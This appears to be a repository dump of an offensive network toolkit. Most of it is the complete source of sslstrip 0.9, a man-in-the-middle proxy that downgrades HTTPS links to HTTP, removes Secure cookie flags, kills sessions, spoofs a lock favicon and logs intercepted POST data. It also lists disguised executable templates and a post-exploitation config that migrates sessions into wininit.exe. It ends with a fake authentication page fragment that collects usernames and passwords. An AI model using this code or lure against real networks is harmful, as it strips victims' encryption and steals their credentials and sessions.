getPathFromUri(self): 68 | if (self.uri.find("http://") == 0): 69 | index = self.uri.find('/', 7) 70 | return self.uri[index:] 71 | 72 | return self.uri 73 | 74 | def getPathToLockIcon(self): 75 | if os.path.exists("lock.ico"): return "lock.ico" 76 | 77 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 78 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 79 | 80 | if os.path.exists(scriptPath): return scriptPath 81 | 82 | logging.warning("Error: Could not find lock.ico") 83 | return "lock.ico" 84 | 85 | def handleHostResolvedSuccess(self, address): 86 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) 87 | host = self.getHeader("host") 88 | headers = self.cleanHeaders() 89 | client = self.getClientIP() 90 | path = self.getPathFromUri() 91 | 92 | self.content.seek(0,0) 93 | postData = self.content.read() 94 | url = 'http://' + host + path 95 | 96 | self.dnsCache.cacheResolution(host, address) 97 | 98 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 99 | logging.debug("Sending expired cookies...") 100 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 101 | host, headers, path)) 102 | elif (self.urlMonitor.isSecureFavicon(client, path)): 103 | logging.debug("Sending spoofed favicon response...") 104 | self.sendSpoofedFaviconResponse() 105 | elif (self.urlMonitor.isSecureLink(client, url)): 106 | logging.debug("Sending request via SSL...") 107 | self.proxyViaSSL(address, self.method, path, postData, headers, 108 | self.urlMonitor.getSecurePort(client, url)) 109 | else: 110 | logging.debug("Sending request via HTTP...") 111 | self.proxyViaHTTP(address, self.method, path, postData, headers) 112 | 113 | def handleHostResolvedError(self, error): 114 | logging.warning("Host resolution error: " + str(error)) 115 | self.finish() 116 | 117 | def resolveHost(self, host): 118 | address = self.dnsCache.getCachedAddress(host) 119 | 120 | if address != None: 121 | logging.debug("Host cached.") 122 | return defer.succeed(address) 123 | else: 124 | logging.debug("Host not cached.") 125 | return reactor.resolve(host) 126 | 127 | def process(self): 128 | logging.debug("Resolving host: %s" % (self.getHeader('host'))) 129 | host = self.getHeader('host') 130 | deferred = self.resolveHost(host) 131 | 132 | deferred.addCallback(self.handleHostResolvedSuccess) 133 | deferred.addErrback(self.handleHostResolvedError) 134 | 135 | def proxyViaHTTP(self, host, method, path, postData, headers): 136 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 137 | connectionFactory.protocol = ServerConnection 138 | self.reactor.connectTCP(host, 80, connectionFactory) 139 | 140 | def proxyViaSSL(self, host, method, path, postData, headers, port): 141 | clientContextFactory = ssl.ClientContextFactory() 142 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 143 | connectionFactory.protocol = SSLServerConnection 144 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 145 | 146 | def sendExpiredCookies(self, host, path, expireHeaders): 147 | self.setResponseCode(302, "Moved") 148 | self.setHeader("Connection", "close") 149 | self.setHeader("Location", "http://" + host + path) 150 | 151 | for header in expireHeaders: 152 | self.setHeader("Set-Cookie", header) 153 | 154 | self.finish() 155 | 156 | def sendSpoofedFaviconResponse(self): 157 | icoFile = open(self.getPathToLockIcon()) 158 | 159 | self.setResponseCode(200, "OK") 160 | self.setHeader("Content-type", "image/x-icon") 161 | self.write(icoFile.read()) 162 | 163 | icoFile.close() 164 | self.finish() 165 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ClientRequest.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/ClientRequest.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/CookieCleaner.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/CookieCleaner.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/DnsCache.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/DnsCache.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url$([\w\d:#@%/;$~_?\+-=\\\.&]+)$", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 49 | 50 | ServerConnection.handleHeader(self, key, value) 51 | 52 | def stripFileFromPath(self, path): 53 | (strippedPath, lastSlash, file) = path.rpartition('/') 54 | return strippedPath 55 | 56 | def buildAbsoluteLink(self, link): 57 | absoluteLink = "" 58 | 59 | if ((not link.startswith('http')) and (not link.startswith('/'))): 60 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 61 | 62 | logging.debug("Found path-relative link in secure transmission: " + link) 63 | logging.debug("New Absolute path-relative link: " + absoluteLink) 64 | elif not link.startswith('http'): 65 | absoluteLink = "http://"+self.headers['host']+link 66 | 67 | logging.debug("Found relative link in secure transmission: " + link) 68 | logging.debug("New Absolute link: " + absoluteLink) 69 | 70 | if not absoluteLink == "": 71 | absoluteLink = absoluteLink.replace('&', '&') 72 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 73 | 74 | def replaceCssLinks(self, data): 75 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 76 | 77 | for match in iterator: 78 | self.buildAbsoluteLink(match.group(1)) 79 | 80 | return data 81 | 82 | def replaceFavicon(self, data): 83 | match = re.search(SSLServerConnection.iconExpression, data) 84 | 85 | if (match != None): 86 | data = re.sub(SSLServerConnection.iconExpression, 87 | "", data) 88 | else: 89 | data = re.sub(SSLServerConnection.headExpression, 90 | "", data) 91 | 92 | return data 93 | 94 | def replaceSecureLinks(self, data): 95 | data = ServerConnection.replaceSecureLinks(self, data) 96 | data = self.replaceCssLinks(data) 97 | 98 | if (self.urlMonitor.isFaviconSpoofing()): 99 | data = self.replaceFavicon(data) 100 | 101 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 102 | 103 | for match in iterator: 104 | self.buildAbsoluteLink(match.group(10)) 105 | 106 | return data 107 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/SSLServerConnection.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/SSLServerConnection.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 34 | 35 | def __init__(self, command, uri, postData, headers, client): 36 | self.command = command 37 | self.uri = uri 38 | self.postData = postData 39 | self.headers = headers 40 | self.client = client 41 | self.urlMonitor = URLMonitor.getInstance() 42 | self.isImageRequest = False 43 | self.isCompressed = False 44 | self.contentLength = None 45 | self.shutdownComplete = False 46 | 47 | def getLogLevel(self): 48 | return logging.DEBUG 49 | 50 | def getPostPrefix(self): 51 | return "POST" 52 | 53 | def sendRequest(self): 54 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 55 | self.sendCommand(self.command, self.uri) 56 | 57 | def sendHeaders(self): 58 | for header, value in self.headers.items(): 59 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 60 | self.sendHeader(header, value) 61 | 62 | self.endHeaders() 63 | 64 | def sendPostData(self): 65 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 66 | self.transport.write(self.postData) 67 | 68 | def connectionMade(self): 69 | logging.log(self.getLogLevel(), "HTTP connection made.") 70 | self.sendRequest() 71 | self.sendHeaders() 72 | 73 | if (self.command == 'POST'): 74 | self.sendPostData() 75 | 76 | def handleStatus(self, version, code, message): 77 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 78 | self.client.setResponseCode(int(code), message) 79 | 80 | def handleHeader(self, key, value): 81 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 82 | 83 | if (key.lower() == 'location'): 84 | value = self.replaceSecureLinks(value) 85 | 86 | if (key.lower() == 'content-type'): 87 | if (value.find('image') != -1): 88 | self.isImageRequest = True 89 | logging.debug("Response is image content, not scanning...") 90 | 91 | if (key.lower() == 'content-encoding'): 92 | if (value.find('gzip') != -1): 93 | logging.debug("Response is compressed...") 94 | self.isCompressed = True 95 | elif (key.lower() == 'content-length'): 96 | self.contentLength = value 97 | elif (key.lower() == 'set-cookie'): 98 | self.client.responseHeaders.addRawHeader(key, value) 99 | else: 100 | self.client.setHeader(key, value) 101 | 102 | def handleEndHeaders(self): 103 | if (self.isImageRequest and self.contentLength != None): 104 | self.client.setHeader("Content-Length", self.contentLength) 105 | 106 | if self.length == 0: 107 | self.shutdown() 108 | 109 | def handleResponsePart(self, data): 110 | if (self.isImageRequest): 111 | self.client.write(data) 112 | else: 113 | HTTPClient.handleResponsePart(self, data) 114 | 115 | def handleResponseEnd(self): 116 | if (self.isImageRequest): 117 | self.shutdown() 118 | else: 119 | HTTPClient.handleResponseEnd(self) 120 | 121 | def handleResponse(self, data): 122 | if (self.isCompressed): 123 | logging.debug("Decompressing content...") 124 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 125 | 126 | logging.log(self.getLogLevel(), "Read from server:\n" + data) 127 | 128 | data = self.replaceSecureLinks(data) 129 | 130 | if (self.contentLength != None): 131 | self.client.setHeader('Content-Length', len(data)) 132 | 133 | self.client.write(data) 134 | self.shutdown() 135 | 136 | def replaceSecureLinks(self, data): 137 | iterator = re.finditer(ServerConnection.urlExpression, data) 138 | 139 | for match in iterator: 140 | url = match.group() 141 | 142 | logging.debug("Found secure reference: " + url) 143 | 144 | url = url.replace('https://', 'http://', 1) 145 | url = url.replace('&', '&') 146 | self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 147 | 148 | data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) 149 | return re.sub(ServerConnection.urlType, 'http://', data) 150 | 151 | def shutdown(self): 152 | if not self.shutdownComplete: 153 | self.shutdownComplete = True 154 | self.client.finish() 155 | self.transport.loseConnection() 156 | 157 | 158 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ServerConnection.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/ServerConnection.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ServerConnectionFactory.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/ServerConnectionFactory.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/StrippingProxy.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/StrippingProxy.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import re 20 | 21 | class URLMonitor: 22 | 23 | ''' 24 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 25 | server is expecting over SSL. It also keeps track of secure favicon urls. 26 | ''' 27 | 28 | # Start the arms race, and end up here... 29 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 30 | _instance = None 31 | 32 | def __init__(self): 33 | self.strippedURLs = set() 34 | self.strippedURLPorts = {} 35 | self.faviconReplacement = False 36 | 37 | def isSecureLink(self, client, url): 38 | for expression in URLMonitor.javascriptTrickery: 39 | if (re.match(expression, url)): 40 | return True 41 | 42 | return (client,url) in self.strippedURLs 43 | 44 | def getSecurePort(self, client, url): 45 | if (client,url) in self.strippedURLs: 46 | return self.strippedURLPorts[(client,url)] 47 | else: 48 | return 443 49 | 50 | def addSecureLink(self, client, url): 51 | methodIndex = url.find("//") + 2 52 | method = url[0:methodIndex] 53 | 54 | pathIndex = url.find("/", methodIndex) 55 | host = url[methodIndex:pathIndex] 56 | path = url[pathIndex:] 57 | 58 | port = 443 59 | portIndex = host.find(":") 60 | 61 | if (portIndex != -1): 62 | host = host[0:portIndex] 63 | port = host[portIndex+1:] 64 | if len(port) == 0: 65 | port = 443 66 | 67 | url = method + host + path 68 | 69 | self.strippedURLs.add((client, url)) 70 | self.strippedURLPorts[(client, url)] = int(port) 71 | 72 | def setFaviconSpoofing(self, faviconSpoofing): 73 | self.faviconSpoofing = faviconSpoofing 74 | 75 | def isFaviconSpoofing(self): 76 | return self.faviconSpoofing 77 | 78 | def isSecureFavicon(self, client, url): 79 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 80 | 81 | def getInstance(): 82 | if URLMonitor._instance == None: 83 | URLMonitor._instance = URLMonitor() 84 | 85 | return URLMonitor._instance 86 | 87 | getInstance = staticmethod(getInstance) 88 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/URLMonitor.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/URLMonitor.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/__init__.py -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/__init__.pyc -------------------------------------------------------------------------------- /templates/WinSCP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/WinSCP.exe -------------------------------------------------------------------------------- /templates/flashplayer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/flashplayer.exe -------------------------------------------------------------------------------- /templates/procexp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/procexp.exe -------------------------------------------------------------------------------- /templates/procexp.sfx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/procexp.sfx.exe -------------------------------------------------------------------------------- /templates/putty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/putty.exe -------------------------------------------------------------------------------- /templates/template.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/templates/template.pdf -------------------------------------------------------------------------------- /toolkit_config: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # # 3 | # The following config file will allow you to customize settings within # 4 | # netool toolkit, The lines that do not have comment code ("#") are the # 5 | # fields you want to toy with. There are additional options, read the # 6 | # comments for additional config settings. # 7 | # # 8 | # REMENBER THAT CHANGING THIS SETTINGS WILL AFFECT # 9 | # netool.sh AND priv8.sh SCRIPTS WAY OF WORKING. # 10 | # -[ Suspicious Shell Activity Labs 2015 ]- # 11 | # # 12 | ########################################################################## 13 | 14 | 15 | # set temporary download folder 16 | # the toolkit will download files to a temp folder 17 | # and then copy the files to the needed path 18 | TEMP_FOLDER=/tmp/evil 19 | 20 | 21 | # display public ip address in r00tsect0r module 22 | # accepted values are YES or NO 23 | DISPLAY_PUBLIC_IP=YES 24 | 25 | 26 | # display changelog at startup in every new update done 27 | # accepted values are YES or NO 28 | SET_CHANGELOG=YES 29 | 30 | 31 | # Clean toolkit logs (.log) on exit? 32 | # accepted values are YES or NO 33 | CLEAN_LOGS=YES 34 | 35 | 36 | # Clean handlers stored (resource files) on exit? 37 | # this setting will delete all listenners.rc 38 | # accepted values are YES or NO 39 | CLEAN_HANDLERS=NO 40 | 41 | 42 | # Clean t00lkit database on exit? 43 | # this setting will clean database.db file 44 | # accepted values are YES or NO 45 | CLEAN_DATABASE=NO 46 | 47 | 48 | # in post exploitation module the 'migrate fuction' will 49 | # migrate the open session to 'wininit.exe' proccess by default 50 | # in this field you can change that to migrate to another 51 | # proccess (example -> notepad.exe or explorer.exe) 52 | MIGRATE_TO=wininit.exe 53 | 54 | 55 | # set php5 installation path 56 | PHP5_INSTALL_PATH=/etc/php5 57 | 58 | 59 | # zenmap-nmap install path 60 | ZENMAP_INSTALL_PATH=/usr/share/nmap 61 | 62 | 63 | # ettercap install path 64 | ETTERCAP_INSTALL_PATH=/usr/share/ettercap 65 | 66 | 67 | # macchanger install path 68 | MACCHANGER_INSTALL_PATH=/usr/share/macchanger 69 | 70 | 71 | # metasploit install path 72 | METASPLOIT_INSTALL_PATH=/usr/share/metasploit-framework 73 | 74 | 75 | # apache web root path 76 | APACHE_INSTALL_PATH=/var/www/html 77 | 78 | 79 | # driftnet install path 80 | DRIFTNET_INSTALL_PATH=/usr/share/doc/driftnet 81 | 82 | 83 | # etter.conf install path 84 | ETTERCONF_INSTALL_PATH=/etc/ettercap/etter.conf 85 | 86 | 87 | # etter.dns install path 88 | ETTERDNS_INSTALL_PATH=/etc/ettercap/etter.dns 89 | 90 | 91 | # etter.services path 92 | ETTERSERV_INSTALL_PATH=/usr/share/ettercap/etter.services 93 | 94 | 95 | # veil evasion install path 96 | VEIL_EVASION_CONF=/etc/veil/settings.py 97 | 98 | 99 | # priv8.sh install path 100 | ROOTSECTOR_INSTALL_PATH=modules/priv8.sh 101 | --------------------------------------------------------------------------------



56 \| Authentication Required 57 \| 58 \| The server http://G4tW41:80 requires a username 59 \| 60 \| and password. The server says: DT 845W 61 \| 62 \|

Username:
Password: